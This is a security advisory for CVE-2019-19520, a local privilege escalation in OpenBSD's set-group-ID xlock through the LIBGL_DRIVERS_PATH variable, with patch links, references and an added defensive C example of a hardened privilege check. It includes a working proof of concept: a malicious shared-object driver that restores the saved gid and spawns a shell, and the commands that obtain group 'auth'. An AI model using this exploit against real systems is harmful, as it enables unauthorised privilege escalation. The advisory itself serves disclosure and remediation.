Allele Security Alert
ASA-2019-00651
Identifier(s)
ASA-2019-00651, CVE-2019-19520
Title
Local privilege escalation via xlock
Vendor(s)
The OpenBSD Project
Product(s)
OpenBSD
Affected version(s)
OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020
Fixed version(s)
OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020
OpenBSD versions 6.6 with the following patch applied:
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
OpenBSD versions 6.5 with the following patch applied:
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Proof of concept
Yes
Description
xlock in OpenBSD allows local users to gain the privileges of the auth group by providing a LIBGL_DRIVERS_PATH environment variable, because xenocara/lib/mesa/src/loader/loader.c mishandles dlopen.
Technical details
On OpenBSD, /usr/X11R6/bin/xlock is installed by default and is set-group-ID “auth”, not set-user-ID; the following check is therefore incomplete and should use issetugid() instead:
    _X_HIDDEN void *
    driOpenDriver(const char *driverName)
    {
        ...
        if (geteuid() == getuid()) {
            /* don't allow setuid apps to use LIBGL_DRIVERS_PATH */
            libPaths = getenv("LIBGL_DRIVERS_PATH");
A local attacker can exploit this vulnerability and dlopen() their own driver to obtain the privileges of the group “auth”:
    $ id
    uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
    $ cd /tmp
    $ cat > swrast_dri.c << "EOF"
    #include <paths.h>
    #include <sys/types.h>
    #include <unistd.h>
    static void __attribute__ ((constructor)) _init (void)
    {
        gid_t rgid, egid, sgid;
        if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
        if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
        char * const argv[] = { _PATH_KSHELL, NULL };
        execve(argv[0], argv, NULL);
        _exit(__LINE__);
    }
    EOF
    $ gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
    $ env -i /usr/X11R6/bin/Xvfb :66 -cc 0 &
    [1] 2706
    $ env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :66
    $ id
    uid=32767(nobody) gid=11(auth) groups=32767(nobody)
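The following is an added illustration, not code from Mesa, OpenBSD or the advisory: it places the uid-only test from driOpenDriver() beside a hardened form that also compares the real, effective and saved group IDs, and shows why the saved gid (the one the proof-of-concept constructor restores with setresgid()) must be part of the decision. The function names honour_env_uid_only, honour_env_hardened, process_is_setugid and driver_search_path and the default driver path are hypothetical.

```c
#define _GNU_SOURCE                 /* getresuid()/getresgid() on glibc */
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* The test Mesa's loader applied before trusting LIBGL_DRIVERS_PATH: it
 * compares user IDs only, so a set-group-ID process such as xlock (rgid
 * "nobody", egid/sgid "auth") still honours the caller-controlled path. */
int honour_env_uid_only(uid_t ruid, uid_t euid, uid_t suid,
                        gid_t rgid, gid_t egid, gid_t sgid)
{
    (void)suid; (void)rgid; (void)egid; (void)sgid;
    return ruid == euid;
}

/* Hardened decision: refuse the variable whenever any real, effective or
 * saved user *or* group ID differs. The saved gid matters: a dlopen()ed
 * module can setresgid() back to it, as the advisory's constructor does. */
int honour_env_hardened(uid_t ruid, uid_t euid, uid_t suid,
                        gid_t rgid, gid_t egid, gid_t sgid)
{
    return ruid == euid && euid == suid && rgid == egid && egid == sgid;
}

/* Runtime form. On OpenBSD issetugid() is authoritative and stays set even
 * after privileges are dropped; elsewhere fall back to the full comparison
 * (on glibc, getauxval(AT_SECURE) is the kernel-backed equivalent). */
int process_is_setugid(void)
{
#if defined(__OpenBSD__)
    return issetugid();
#else
    uid_t ru, eu, su;
    gid_t rg, eg, sg;
    if (getresuid(&ru, &eu, &su) != 0 || getresgid(&rg, &eg, &sg) != 0)
        return 1;                       /* fail closed */
    return !honour_env_hardened(ru, eu, su, rg, eg, sg);
#endif
}

/* Mirrors the decision point in loader.c: the environment path is used only
 * by an unprivileged process; default_path is a placeholder, not Mesa's. */
const char *driver_search_path(const char *env_path, const char *default_path,
                               int setugid)
{
    if (setugid || env_path == NULL || env_path[0] == '\0')
        return default_path;
    return env_path;
}
```

With the proof-of-concept's IDs (uid 32767 throughout, rgid 32767, egid/sgid 11) the uid-only test accepts the variable while the hardened test rejects it.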
Credits
Qualys Research Team
Reference(s)
OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html
OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414
Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14
oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5
Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8
CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520
CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: February 11, 2020